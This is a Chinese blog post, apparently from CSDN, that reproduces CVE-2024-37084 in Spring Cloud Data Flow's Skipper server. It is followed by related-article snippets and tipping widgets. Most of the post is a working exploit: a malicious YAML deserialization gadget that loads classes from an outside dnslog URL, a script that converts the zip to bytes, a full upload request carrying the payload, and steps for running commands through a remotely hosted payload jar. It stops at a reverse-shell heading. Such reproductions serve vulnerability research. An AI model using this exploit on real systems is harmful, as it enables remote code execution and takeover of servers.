【漏洞复现】Spring Cloud Data Flow - CVE-2024-37084 漏洞复现

已于 2024-12-20 12:43:58 修改
阅读量1.3k 收藏 18
点赞数 17
分类专栏: 漏洞复现 文章标签: CVE-2024-37084
于 2024-10-15 15:30:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/142955634
版权

CVE-2024-37084

Spring Cloud Data Flow(SCDF)是一个基于微服务的工具包,用于在 Cloud Foundry 和 Kubernetes 中构建流式和批量数据处理管道。在受影响版本中Skipper 服务器在处理文件上传时没有对路径进行验证,拥有 Skipper 服务器 API 访问权限攻击者可以通过构造恶意请求将 YAML 文件写入服务器的任意位置,同时由于 PackageMetadata 的创建过程中使用默认构造器反序列化 YAML 数据,从而导致任意代码执行。

Spring Cloud Skipper是一个包管理器,它专为在多个云平台上部署、升级及回滚Spring Boot应用程序而设计。Skipper是Spring Cloud Data Flow的一个核心组件,负责处理应用程序的部署、升级和回滚等操作。

影响版本

  • [2.11.0 - 2.11.3]

环境搭建

  • 测试版本:Spring Cloud Data Flow 2.11.3

使用 docker 的方式搭建,虚拟机建议 3G 内存。下载该版本源码:Releases · spring-cloud/spring-cloud-dataflow · GitHub,复制到 ubuntu 中。

进入 src/docker-compose 目录,执行 docker-compose up -d 启动

如下都能访问,说明环境启动成功

#Spring Cloud Data Flow Server的默认HTTP端口
http://localhost:9393/dashboard
#Skipper server port
http://localhost:7577/api

漏洞复现

1. 新建文件夹 thePoc-5.0.0,其中package.yaml 文件内容如下,替换如下的 dnslog 地址

repositoryId: 1
repositoryName: local
apiVersion: 1.0.0
version: 5.0.0
kind: test
origin: thePoc
displayName: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://8nygtm.dnslog.cn"]]]]
name: thePoc

2. 将文件夹 thePoc-5.0.0 打包成thePoc-5.0.0.zip

3. 使用如 python 下脚本生成packageFileAsBytes

with open('thePoc-5.0.0.zip', 'rb') as zip_file:
    print(list(zip_file.read()))

4. 发送 poc,将生成的数据替换到packageFileAsBytes 中

POST /api/package/upload HTTP/1.1
Host: 192.168.67.135:7577
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Content-Type: application/json
Content-Length: 2057

{"repoName": "local", "name": "thePoc", "version": "5.0.0", "extension": "zip", "packageFileAsBytes":[80, 75, 3, 4, 20, 0, 0, 0, 8, 0, 188, 164, 78, 89, 183, 61, 203, 157, 172, 0, 0, 0, 245, 0, 0, 0, 25, 0, 0, 0, 116, 104, 101, 80, 111, 99, 45, 53, 46, 48, 46, 48, 47, 112, 97, 99, 107, 97, 103, 101, 46, 121, 97, 109, 108, 93, 78, 65, 10, 194, 48, 16, 188, 7, 242, 135, 216, 7, 164, 245, 32, 72, 175, 226, 65, 168, 34, 138, 94, 138, 135, 37, 9, 105, 52, 221, 132, 36, 20, 251, 123, 163, 85, 10, 206, 101, 153, 157, 217, 217, 9, 202, 187, 104, 146, 11, 227, 78, 214, 108, 73, 201, 188, 56, 64, 175, 106, 102, 157, 0, 75, 9, 120, 115, 85, 33, 26, 135, 217, 197, 43, 94, 81, 50, 252, 248, 106, 226, 15, 131, 57, 34, 169, 152, 40, 113, 193, 104, 131, 153, 117, 234, 232, 4, 37, 210, 68, 111, 225, 27, 185, 88, 220, 97, 128, 39, 143, 34, 24, 159, 248, 249, 51, 182, 152, 15, 212, 30, 16, 180, 10, 172, 157, 60, 28, 85, 226, 151, 83, 179, 177, 16, 99, 227, 64, 190, 165, 63, 141, 181, 69, 151, 146, 175, 203, 114, 141, 163, 78, 61, 151, 24, 173, 211, 92, 96, 113, 203, 160, 4, 243, 211, 185, 9, 203, 120, 1, 80, 75, 3, 4, 20, 0, 0, 0, 0, 0, 168, 162, 78, 89, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 0, 0, 0, 116, 104, 101, 80, 111, 99, 45, 53, 46, 48, 46, 48, 47, 80, 75, 1, 2, 63, 0, 20, 0, 0, 0, 8, 0, 188, 164, 78, 89, 183, 61, 203, 157, 172, 0, 0, 0, 245, 0, 0, 0, 25, 0, 36, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 116, 104, 101, 80, 111, 99, 45, 53, 46, 48, 46, 48, 47, 112, 97, 99, 107, 97, 103, 101, 46, 121, 97, 109, 108, 10, 0, 32, 0, 0, 0, 0, 0, 1, 0, 24, 0, 154, 12, 201, 227, 53, 30, 219, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 80, 75, 1, 2, 63, 0, 20, 0, 0, 0, 0, 0, 168, 162, 78, 89, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 0, 36, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 227, 0, 0, 0, 116, 104, 101, 80, 111, 99, 45, 53, 46, 48, 46, 48, 47, 10, 0, 32, 0, 0, 0, 0, 0, 1, 0, 24, 0, 156, 125, 205, 143, 51, 30, 219, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 80, 75, 5, 6, 0, 0, 0, 0, 2, 0, 2, 0, 202, 0, 0, 0, 14, 1, 0, 0, 0, 0]}

命令执行
  1. 下载 exp 源码:GitHub - Ly4j/CVE-2024-37084-Exp: Spring Cloud Data Flow CVE-2024-37084 exp
  2. src\artsploit\AwesomeScriptEngineFactory.java,exec()中输入你想执行的命令

双击.py 文件生成 yaml-payload.jar 文件

  1. 将 yaml-payload.jar 放在 linux 服务器上,用 python 启动一个 web 服务。注意:每次执行不同的命令,都需要重新命名yaml-payload.jar,即让访问的xx.jar,每次名字都不同。否则新命令不生效

访问路径如:http://192.168.67.133/yaml-payload.jar

cve-2024-37084-exp.py -u http://192.168.67.135:7577 -payload http://192.168.67.133/yaml-payload.jar

进入对应的容器查看,成功执行命令

反弹 shell

D-Tale SSRF漏洞复现CVE-2024-21642)
0xSec
01-22 719
D-Tale 是 Pandas 数据结构的可视化工具。3.9.0 之前的 D-Tale 版本的用户可能容易受到服务器端请求伪造 (SSRF) 的攻击,从而使攻击者能够访问服务器上的文件。
漏洞复现】likeshop开源免费商用电商系统存在任意文件上传漏洞CVE-2024-0352
失心少年
02-04 375
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。Likeshop 2.5.7.20210311及之前版本存在代码问题漏洞,该漏洞源于文件server/application/api/controller/File.php的参数file会导致不受限制的上传。漏洞链接:https://127.0.0.1/api/file/formimage。
Apache CXF Aegis databinding SSRF 高危漏洞修复
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
05-23 1943
2、Spring Web UriComponentsBuilder URL解析不当漏洞修复。Spring Web UriComponentsBuilder URL解析不当漏洞。1、Apache CXF Aegis databinding SSRF漏洞修复。Apache CXF Aegis databinding SSRF漏洞。进入服务器搜索 databinding。三、maven包升级版本查询。如搜索spring-boot。找到了spring-web。发现版本是3.1.6。果断升级到3.5.8。
漏洞复现CVE-2024-37032 Ollama远程代码执行漏洞
weixin_53270267的博客
02-27 821
docker 环境准备好之后,在kali2024的浏览器测试一下ollama是否开启。如果报如下错误,说明docker源配置错误,需要进行docker源配置。修改好之后,在攻击者电脑上先用python3运行server.py。这里我用kali2024当靶机,kali2023当攻击者机器。这里是为了和攻击成功后得到的 /etc/passwd进行比对。接着重新打开一个命令框,用python3运行poc.py。首先准备两台机器,一台当攻击者机器,一台当靶机。在攻击者电脑kali2023上下载复现代码。
漏洞复现CVE-2024-38856(ApacheOfbiz RCE)
最新发布
blackpeach的博客
04-22 722
ApacheOfbiz RCE 漏洞复现,Groovy 表达式注入
CVE-2024-50379漏洞复现
qq_61972142的博客
01-03 4625
CVE-2024-50379:Apache Tomcat 条件竞争文件上传漏洞 Apache Tomcat作为一款开源的servlet容器,在全球范围内被大量的企业以及开发者所使用,用来搭建各类的web应用,其安全性也极其的重要; 目录 1、漏洞介绍 2、漏洞影响的版本范围 3、漏洞复现环境搭建 4、复现过程 5、漏洞修复建议 1、漏洞介绍 Apache Tomcat存在着TOCTOU竞争条件的远程代码执行漏洞,该漏洞是因为Apache Tomcat在编译解析jsp期
漏洞学习篇:CVE漏洞复现
dzqxwzoe的博客
02-04 1676
1、200份很多已经买不到的绝版电子书 2、30G安全大厂内部的视频资料 3、100份src文档 4、常见安全面试题 5、ctf大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线。Apache HTTP Server 是 Apache 基础开放的流行的 HTTP 服务器。攻击者利用这个漏洞,可以读取到Apache服务器Web目录以外的其他文件,或者读取Web中的脚本源码,或者在开启cgi或cgid的服务器上执行任意命令。可以看见,apache是49版本的。这里用vulhub环境。
框架安全-CVE 复现&Spring&Struts&Laravel&ThinkPHP漏洞复现
zz12345600354的博客
04-26 902
目录 服务攻防-框架安全&CVE 复现&Spring&Struts&Laravel&ThinkPHP * 概述 PHP-开发框架安全-Thinkphp&Laravel * 漏洞复现 * Thinkphp-3.X RCE Thinkphp-5.X RCE Laravel框架安全问题- CVE-2021-3129 RCE JAVAWEB-开发框架安全-Spring&Struts2 * Struts2框架安全
Spring Cloud 爆高危漏洞,老板给你打电话了没?
公众号:微观技术
03-14 322
大家好!我是Tom哥互联网时代,微服务盛行,为了整合生态,Spring Cloud 横空出世。之前Tom哥还写过一篇全家桶文章《【万字长文】创业公司就应该技术选型 Spring Cloud Alibaba , 开箱即用》正所谓 “成也萧何,败也萧何”, 这货提供了便利同时,也经常捅个篓子。这不刚刚又爆出个漏洞Spring Cloud 突发漏洞Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway 又突发高危漏洞,又得折腾了。。。2022年3月1日,Spring官方
【组件攻击链】一文看懂Spring全家桶各类RCE漏洞
HBohan的博客
01-18 1038
一、Spring全家桶简介 Spring发展到现在,全家桶所包含的内容非常庞大,这里主要介绍其中关键的5个部分,分别是spring framework、 springboot、 spring cloudspring security、spring mvc。其中的spring framework就是大家常常提到的spring, 这是所有spring内容最基本的底层架构,其包含spring mvc、springboot、spring core、IOC和AOP等等。Spring mvc就是spring中的一个.
盘点:Spring全家桶各类历史RCE漏洞浅析,没你想的难
lt_xiaodou的博客
10-10 465
Spring mvc就是spring中的一个MVC框架,主要用来开发web应用和网络接口,但是其使用之前需要配置大量的xml文件,比较繁琐,所以出现springboot,其内置tomcat并且内置默认的XML配置信息,从而方便了用户的使用。下图就直观表现了他们之间的关系。其实都用了SpEL表达式,不过addModelBindings方法传入的参数的是上面提到的binder,是写死在xml文件中的,无法去更改,所以这里面就考虑当没配置binder的情况下走进addDefaultMapping方法的情况。
vulhub之Spring
追风少年亚索的博客
11-01 758
免责声明: 本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
CVE-2024-9047复现
songmoshangchen的博客
01-06 1302
这使得未经身份验证的攻击者能够读取或删除原始意图目录之外的文件。成功利用此漏洞要求目标WordPress安装使用PHP 7.4或更早版本。插件存在路径遍历漏洞,该漏洞影响所有版本至包括(含)4.24.11版本,漏洞位于。以下代码是是4.24.11版本WordPress File Upload。既然是路径遍历漏洞,先定位一下。WordPress的。
Apache Tomcat RCE 稳定复现 保姆级!(CVE-2024-50379)附视频+POC
web13765607643的博客
02-24 1142
最近爆出 Apache Tomcat条件竞争导致的RCE,影响范围当然是巨大的,公司也及时收到了相关情报,于是老大让我复现,以更好的帮助公司进行修复漏洞复现难度其实并不大,但是成功率很低,相信很多师傅也在复现,希望能够成功,所以我对“成功率”进行了一点点研究,希望能够提高师傅们复现成功的概率。
Spring Cloud 再爆高危漏洞.... 赶紧修复
终码一生
03-07 5209
点击“终码一生”,关注,置顶公众号 每日技术干货,第一时间送达! Log4j2 的核弹级漏洞刚告一段落,Spring Cloud Gateway又突发高危漏洞,又得折腾了。。。 2022年3月1日,Spring官方发布了关于Spring Cloud Gateway的两个CVE漏洞,分别为CVE-2022-22946与CVE-2022-22947: 版本/分支/tag:3.4.X 问题描述: Spring Cloud Gateway 是 Spring Cloud .
【Web】NepCTF 2024题解
uuzeray的博客
08-26 1413
这里要求存在一个用户NepNepIStheBestTeam,在前面就注册这个用户就能登录8080端口。找到拿字符串的html位置,手改成自己的 id,然后注册。第一个注册流程,无论给什么图片都是TEST。数据占用打崩,让服务重启反弹shell。对着CVE-2024-37084复现。参数不能带空格,用${IFS}flag在phpinfo里。start.sh有权限更改。反弹shell拿flag。upload.py上传。root权限读flag。zip包转字节列表脚本。在文件名处打SSTI。生成恶意文件名的文件。
2024-HW最新漏洞整理及相应解决方案(一)
m0_72210904的博客
07-29 2567
漏洞是基于部分安全厂家、软件厂商的公众号或官方网站,以及一些非官方渠道等途径整理的HW安全漏洞情报,情报里附含漏洞详情和解决方案。护网期间我将持续更新分享,希望可以在护网期间帮助到大家。
CXF开发与配置webservice
热门推荐
cyf_cyf的专栏
01-09 3万+
Apache CXF 继承自Celtix 和XFire这两大开源项目,Apache CXF 的前身叫 Apache CeltiXfire,现在已经正式更名为 Apache CXF 了,以下简称为 CXF。CXF 继承了 Celtix 和 XFire 两大开源项目的精华,提供了对 JAX-WS 全面的支持,并且提供了多种 Binding 、DataBinding、Transport 以及各种 For
Spring Cloud Gateway RCE漏洞原理分析与复现CVE-2022-22947)
日常技术分享
10-16 7600
Spring Cloud Gateway RCE漏洞原理分析与复现CVE-2022-22947)
Tiki组件漏洞复现CVE-2020-15906和CVE-2021-26119研究
通过上述知识点的详细阐述,我们对tiki组件的两个特定漏洞CVE-2020-15906和CVE-2021-26119有了全面的认识,以及如何在实际环境中复现这些漏洞和采取的防御措施有了深入的理解。安全研究者和系统管理员可以利用这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值